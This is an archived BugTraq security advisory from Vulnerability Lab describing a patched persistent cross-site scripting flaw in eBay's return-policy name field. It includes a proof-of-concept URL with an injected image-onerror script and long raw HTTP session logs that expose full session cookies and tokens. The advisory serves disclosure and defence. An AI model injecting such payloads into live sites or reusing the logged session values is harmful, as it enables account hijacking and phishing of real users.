BugTraq
Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability Apr 21 2015 09:58AM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1228

Release Date:
=============
2015-03-25

Vulnerability Laboratory ID (VL-ID):
====================================
1228

Common Vulnerability Scoring System:
====================================
4

Product & Service Introduction:
===============================
eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered in San Jose, California. It was founded by Pierre Omidyar in 1995,
and became a notable success story of the dot-com bubble; it is now a multi-billion dollar business with operations localized in over thirty countries. The company
manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to
its auction-style sellings, the website has since expanded to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com);
online classified advertisements online event ticket trading online money transfers and other services.

(Copy of the Homepage: http://en.wikipedia.org/wiki/EBay )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered mutliple persistent input validation web vulnerabilities in the official Ebay Xcom Policy Web-Application (CMS & API).

Vulnerability Disclosure Timeline:
==================================
2014-03-16: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2014-03-17: Vendor Notification (eBay Inc - Security Research Team)
2014-04-16: Vendor Response/Feedback (eBay Inc - Security Research Team)
2015-03-19: Vendor Fix/Patch (eBay Inc - Xcom Developer Team)
2015-03-25: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Ebay Inc.
Product: Ebay Inc - Official WebSite Magento Application & API 2014 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
Multiple application-side input validation web vulnerabilities has been discovered in the official Ebay Xcom Policy Web-Application (CMS & API).
A persistent validation web vulnerability allows remote attackers to inject malicious script codes to the application-side of the affected ebay online-service.

The vulnerability is located in the `my ebay account > return policy > edit returm policy module. The vulnerable input is the return policy name value.
The persistent script code execution occurs in the affected vulnerable sections of the connected `businesspolicy/manage` and `Activity Log - Item Listing`
modules. The attack vector is persistent and the severity is medium.

The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.0.
Exploitation of the persistent input validation vulnerability requires a low privileged web-application user account and low user interaction.
Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent
manipulation of affected and connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] My Account > Return Policy > Edit Return Policy (http://www.bizpolicy.ebay.com/businesspolicy/)

Vulnerable Input(s):
[+] Edit return policy > Policy name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] ebay.com/businesspolicy/manage
[+] Activity Log - Item Listing > Name

Proof of Concept (PoC):
=======================
The application-side cross site web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Manage your business policies
http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=5284418601
5&mode=edit&catId=ALL&profileName=Return+Policy+1+
%22%3E%3Cimg+src%3Dx+onerror%3Dprompt([PERSISTENT INJECTED SCRIPT CODES!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money

+Back&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinO
ption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Buyer&desc
ription=&_=1395079926788

PoC: Manage your business policies

<a href="return?totalPages=1&profileType=RETURN_POLICY&profileId=5284418601
5&pageNumber=1&source=manage">Return Policy 1 [PERSISTENT SCRIPT CODE EXECUTION!]"><img src="x" onerror="prompt(23);"></a>

--- PoC Session Logs [GET] (Injection)---
Status: 200[OK]
GET http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=5284418601
5&mode=edit&catId=ALL&profileName=Return++%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money+
Back+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E++++%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&catDefault=on&returnsAcceptedOption=ReturnsAccepted&return
sWithinOption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Bu
yer&description=+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&_=1395079183016 Load Flags[LOAD_BACKGROUND ] Grö�e des Inhalts[-1] Mime Type[application/json]
Request Header:
Host[www.bizpolicy.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1
&profileId=52844186015&pageNumber=1&source=manage]
Cookie[ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Edv%3D532737c1%5Esbf%3D%23
200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5Epsi%3DAMiGpAAE
*%5E; dp1=bkms/in56e99ed8^u1f/Benjamin55086b58^tzo/-3c532745e8^idm/153274c6b^e
xc/0%3A0%3A0%3A0534ec4d8^pcid/159931376355086b58^reg/%5EflagReg%3D1%5E56
e99ed8^mms/0.53272b71.053288945^mpc/0%7C77533466d8^a1p/053288958^u1p/MjA
xNC5rdW56bQ**55086b58^bl/DE56e99ed8^pbf/%2340000000000081a88200000455086
b58^; s=BAQAAAUSucEmyAAWAAAwAClMoiVgxMjI1NjM3OTA2APgAIFMoiVhkMGE1YWU0NTE0NDBhN
DI4YjM4MmZlMzJmZmZmZmU4NAAGAAFTKIlYMAFKABhTKIlYNTMyNzM3YzAuMC4xLjExLjc4L
jIuMC4yAWUAAlMoiVgjMgASAApTKIlYdGVzdENvb2tpZQA9AApTKIlYMjAxNC5rdW56bQCoA
AFTKHhdMQD0ACJTKIlYJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TK
IlYMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5P
SZ0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c
3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOQQxMzk1MDc5M
zUwOjAAAwABUyiJWDAv3s3bBB0RgoZUFN7eKtp3q+XXQw**; nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa1gwMDAwMDAwMQC0AAFTJ0XoMAFkAANVCGtY
IzhhADMACVUIa1gzNDEyOCxERVUAywABUyc+4DkAmgALUynJ3TIwMTQua3Vuem1uAEAAClUI
a1gyMDE0Lmt1bnptABAAClUIa1gyMDE0Lmt1bnptAPMAIlUIa1gkMiRBUEtoTlkvUCQudWpD
Z0RKQ0hiLnZtT281ekxSVHoxAMoAIFyNOVhjNzdjZjNkZjE0NDBhMzU4NmMyNDRhZDRmZmZm
ZmU0ZgFNABhVCGtYNTMyNzM3Y2EuMC4xLjIuMTM2LjAuMC4yAAQAClUIWl0yMDE0Lmt1bnpt
AJwAOFUIa1huWStzSFoyUHJCbWRqNndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2
eDluWStzZVE9PQFMABhVCGtYNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4ymyXRGsd3A9RVp8Gy
edSQ2Mpg46Y*; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a
56b23d61f96fe2e024155086b58^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIa1gxMjI1NjM3OTA2LzA7ps7P/+muFmbIebGiTM4y7Qo
jOkA*; secses=BAQAAAUSucEmyAAaAAUsAGFUIa1g1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjLdM4p5
xXUvbFN7uT+3s6eDqkVrhQ**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0
RgsFk; JSESSIONID=A6DA3F8E8AAAD1275E907380FF01C01A; ds2=sotr/b7qgDzzzzzzz^]
Connection[keep-alive]
Response Header:
rlogid[t6al%7Cwliodz%3F%3Cwk%7D%3Ee36e*715f-144d1330b33-0x95]
Set-Cookie[JSESSIONID=5C2569C0FFBDC86ABDFC0BFBE77658C6; Path=/
ds2=;Domain=.ebay.com;Path=/
ds1=ats/1395074781098;Domain=.ebay.com;Path=/
ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Esbf%3D%23200000000000c0048002004
%5Edv%3D532737c1%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5E;Domain=.ebay.com;Pat
h=/
cssg=d0a5ae451440a428b382fe32fffffe84;Domain=.ebay.com;Path=/
ns1=BAQAAAUSucEmyAAaAAKUADVUIa5MxMjI1NjM3OTA2LzA7u3yVKIuPORIyGkkPfr8OcQu
zK7o*;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 17:59:47 GMT;Path=/; HttpOnly
dp1=bkms/in56e99f13^u1f/Benjamin55086b93^tzo/-3c53274623^idm/153274c6b^e
xc/0%3A0%3A0%3A0534ec513^pcid/159931376355086b93^reg/%5EflagReg%3D1%5E56
e99f13^mpc/0%7C7753346713^mms/0.53272b71.053288945^a1p/053288993^u1p/MjA
xNC5rdW56bQ**55086b93^bl/DE56e99f13^pbf/%2340000000000081a88200000455086
b93^;Domain=.ebay.com;Expires=Wed, 16-Mar-2016 17:59:47 GMT;Path=/
s=BAQAAAUSucEmyAAWAAAwAClMoiZMxMjI1NjM3OTA2AAYAAVMoiZMwAPgAIFMoiZNkMGE1Y
WU0NTE0NDBhNDI4YjM4MmZlMzJmZmZmZmU4NAFKABhTKImTNTMyNzM3YzAuMC4xLjExLjc4L
jIuMC4yAWUAAlMoiZMjMgASAApTKImTdGVzdENvb2tpZQA9AApTKImTMjAxNC5rdW56bQCoA
AFTKHhdMQD0ACJTKImTJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TK
ImTMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5P
SZ0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c
3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOT8xMzk1MDc5M
zUwOjAAAwABUyiJkzDDEUmmricxEndGpoBjz/CyDgT4jg**;Domain=.ebay.com;Path=/;
HttpOnly
secses=BAQAAAUSucEmyAAaAAUsAGFUIa5M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjIkh3iW
sd46p2pvujmnDykXMnpWKA**;Domain=.ebay.com;Path=/; HttpOnly
nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa5MwMDAwMDAwMQC0AAFTJ0YjMAFkAANVCGuT
IzhhADMACVUIa5MzNDEyOCxERVUAywACUyc/GzEwAJoAC1Mpyd0yMDE0Lmt1bnptbgBAAApV
CGuTMjAxNC5rdW56bQAQAApVCGuTMjAxNC5rdW56bQDKACBcjTmTYzc3Y2YzZGYxNDQwYTM1
ODZjMjQ0YWQ0ZmZmZmZlNGYA8wAiVQhrkyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6
TFJUejEBTQAYVQhrkzUzMjczN2NhLjAuMS4yLjEzNi4wLjAuMgAEAApVCFpdMjAxNC5rdW56
bQFMABhVCGuTNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAJwAOFUIa5NuWStzSFoyUHJCbWRq
NndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PX7IQgibAoX1mYyj
T4uLQSg4TVkI;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 17:59:47 GMT;Path=/
lucky9=9393341;Domain=.ebay.com;Expires=Sat, 16-Mar-2019 17:59:47 GMT;Path=/]
Content-Encoding[gzip]
Content-Type[application/json;charset=UTF-8]
Transfer-Encoding[chunked]
Date[Mon, 17 Mar 2014 17:59:47 GMT]
Server[eBay Server]

Status: 200[OK]
GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1
&_=1395075357940
Load Flags[LOAD_BACKGROUND ] Grö�e des Inhalts[22] Mime Type[text/plain]
Request Header:
Host[my.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbayBeta&CurrentPage=MyeBa
yNextNotificationPreferences&FClassic=true&ssPageName=STRK:ME:MANPX&_trk
sid=p5039.m2295.l3917]
Cookie[ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Esbf%3D%23200000000000c004
8002004%5Edv%3D532737c1%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5E; dp1=bkms/in56e99f13^u1f/Benjamin55086b93^tzo/-3c53274623^idm/153274c6b^e
xc/0%3A0%3A0%3A0534ec513^pcid/159931376355086b93^reg/%5EflagReg%3D1%5E56
e99f13^mpc/0%7C7753346713^mms/0.53272b71.053288945^a1p/053288993^u1p/MjA
xNC5rdW56bQ**55086b93^bl/DE56e99f13^pbf/%2340000000000081a88200000455086
b93^; s=BAQAAAUSucEmyAAWAAAwAClMoiZMxMjI1NjM3OTA2AAYAAVMoiZMwAPgAIFMoiZNkMGE1Y
WU0NTE0NDBhNDI4YjM4MmZlMzJmZmZmZmU4NAFKABhTKImTNTMyNzM3YzAuMC4xLjExLjc4L
jIuMC4yAWUAAlMoiZMjMgASAApTKImTdGVzdENvb2tpZQA9AApTKImTMjAxNC5rdW56bQCoA
AFTKHhdMQD0ACJTKImTJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TK
ImTMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5P
SZ0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c
3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOT8xMzk1MDc5M
zUwOjAAAwABUyiJkzDDEUmmricxEndGpoBjz/CyDgT4jg**; nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa5MwMDAwMDAwMQC0AAFTJ0YjMAFkAANVCGuT
IzhhADMACVUIa5MzNDEyOCxERVUAywACUyc/GzEwAJoAC1Mpyd0yMDE0Lmt1bnptbgBAAApV
CGuTMjAxNC5rdW56bQAQAApVCGuTMjAxNC5rdW56bQDKACBcjTmTYzc3Y2YzZGYxNDQwYTM1
ODZjMjQ0YWQ0ZmZmZmZlNGYA8wAiVQhrkyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6
TFJUejEBTQAYVQhrkzUzMjczN2NhLjAuMS4yLjEzNi4wLjAuMgAEAApVCFpdMjAxNC5rdW56
bQFMABhVCGuTNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAJwAOFUIa5NuWStzSFoyUHJCbWRq
NndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PX7IQgibAoX1mYyj
T4uLQSg4TVkI; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a
56b23d61f96fe2e024155086b58^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIa5MxMjI1NjM3OTA2LzA7u3yVKIuPORIyGkkPfr8OcQu
zK7o*; secses=BAQAAAUSucEmyAAaAAUsAGFUIa5M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjIkh3iW
sd46p2pvujmnDykXMnpWKA**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0
RgsFk; JSESSIONID=37628EA4B997D2976280801A071E51EE; ds2=]
Connection[keep-alive]
Response Header:
Server[Apache-Coyote/1.1]
rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.g%6047-144d1334a30-0x133]
Set-Cookie[ds1=ats/1395074781098; Domain=.ebay.com; Path=/
ds2=; Domain=.ebay.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%
5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; Domain=.ebay.com; Path=/
dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e
99f23^pcid/159931376355086ba3^mpc/0%7C7753346723^pbf/%2340000000000081a8
8200000455086ba3^tzo/-3c53274633^exc/0%3A0%3A0%3A0534ec523^mms/0.53272b7
1.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274
c6b^; Domain=.ebay.com; Expires=Wed, 16-Mar-2016 18:00:03 GMT; Path=/
ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfs
BYFA*;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 18:00:03 GMT;Path=/; HttpOnly
cssg=d0a5ae451440a428b382fe32fffffe84; Domain=.ebay.com; Path=/
s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGA
AFTKImjMACoAAFTKHhdMQFKABhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoi
aMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZ
GxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZ
W5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29ra
WUA9AAiUyiJoyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwY
TVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnOU8xMzk1MDc5MzUwOjAAPQAKU
yiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**;Domain=.ebay.com;Path=/;
HttpOnly
nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAK
VQhaXTIwMTQua3Vuem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRm
AMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3
MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM0MTI4LERF
VQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACa
AAtTKcndMjAxNC5rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRq
NkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6
aCD30vVea2+e; Domain=.ebay.com; Expires=Tue, 17-Mar-2015 18:00:03 GMT; Path=/
secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5Ww
maLoxSDYeRvnyhWgee/Y/g**; Domain=.ebay.com; Path=/
lucky9=9393341; Domain=.ebay.com; Expires=Sat, 16-Mar-2019 18:00:03 GMT; Path=/]
Cache-Control[private]
Pragma[no-cache]
Content-Type[text/plain]
Content-Length[22]
Date[Mon, 17 Mar 2014 18:00:03 GMT]

Status: 200[OK]
GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1
&_=1395079046614 Load Flags[LOAD_BACKGROUND ] Grö�e des Inhalts[22] Mime Type[text/plain]
Request Header:
Host[my.ebay.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&CurrentPage=MyeBayPre
ferences&FClassic=true&ssPageName=STRK:ME:MAPRX]
Cookie[ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ec
os%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e
99f23^pcid/159931376355086ba3^mpc/0%7C7753346723^pbf/%2340000000000081a8
8200000455086ba3^tzo/-3c53274633^exc/0%3A0%3A0%3A0534ec523^mms/0.53272b7
1.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274
c6b^; s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGA
AFTKImjMACoAAFTKHhdMQFKABhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoi
aMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZ
GxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZ
W5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29ra
WUA9AAiUyiJoyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwY
TVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnOU8xMzk1MDc5MzUwOjAAPQAKU
yiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**; nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAK
VQhaXTIwMTQua3Vuem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRm
AMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3
MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM0MTI4LERF
VQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACa
AAtTKcndMjAxNC5rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRq
NkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6
aCD30vVea2+e; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a
56b23d61f96fe2e024155086b58^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfs
BYFA*; secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5Ww
maLoxSDYeRvnyhWgee/Y/g**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0
RgsFk; JSESSIONID=37628EA4B997D2976280801A071E51EE]
Connection[keep-alive]
Response Header:
Server[Apache-Coyote/1.1]
rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.32%3Ef-144d1334c9e-0x132]
Set-Cookie[ds1=ats/1395074781098; Domain=.ebay.com; Path=/
ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%
5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; Domain=.ebay.com; Path=/
dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e
99f23^pcid/159931376355086ba3^pbf/%2340000000000081a88200000455086ba3^mp
c/0%7C7753346723^tzo/-3c53274633^exc/0%3A0%3A0%3A0534ec523^mms/0.53272b7
1.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274
c6b^; Domain=.ebay.com; Expires=Wed, 16-Mar-2016 18:00:03 GMT; Path=/
ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfs
BYFA*;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 18:00:03 GMT;Path=/; HttpOnly
cssg=d0a5ae451440a428b382fe32fffffe84; Domain=.ebay.com; Path=/
s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGA
AFTKImjMACoAAFTKHhdMQFKABhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoi
aMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZ
GxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZ
W5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29ra
WUA9AAiUyiJoyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwY
TVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnOU8xMzk1MDc5MzUwOjAAPQAKU
yiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**;Domain=.ebay.com;Path=/;
HttpOnly
nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAK
VQhaXTIwMTQua3Vuem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRm
AMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3
MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM0MTI4LERF
VQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACa
AAtTKcndMjAxNC5rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRq
NkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6
aCD30vVea2+e; Domain=.ebay.com; Expires=Tue, 17-Mar-2015 18:00:03 GMT; Path=/
secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5Ww
maLoxSDYeRvnyhWgee/Y/g**; Domain=.ebay.com; Path=/
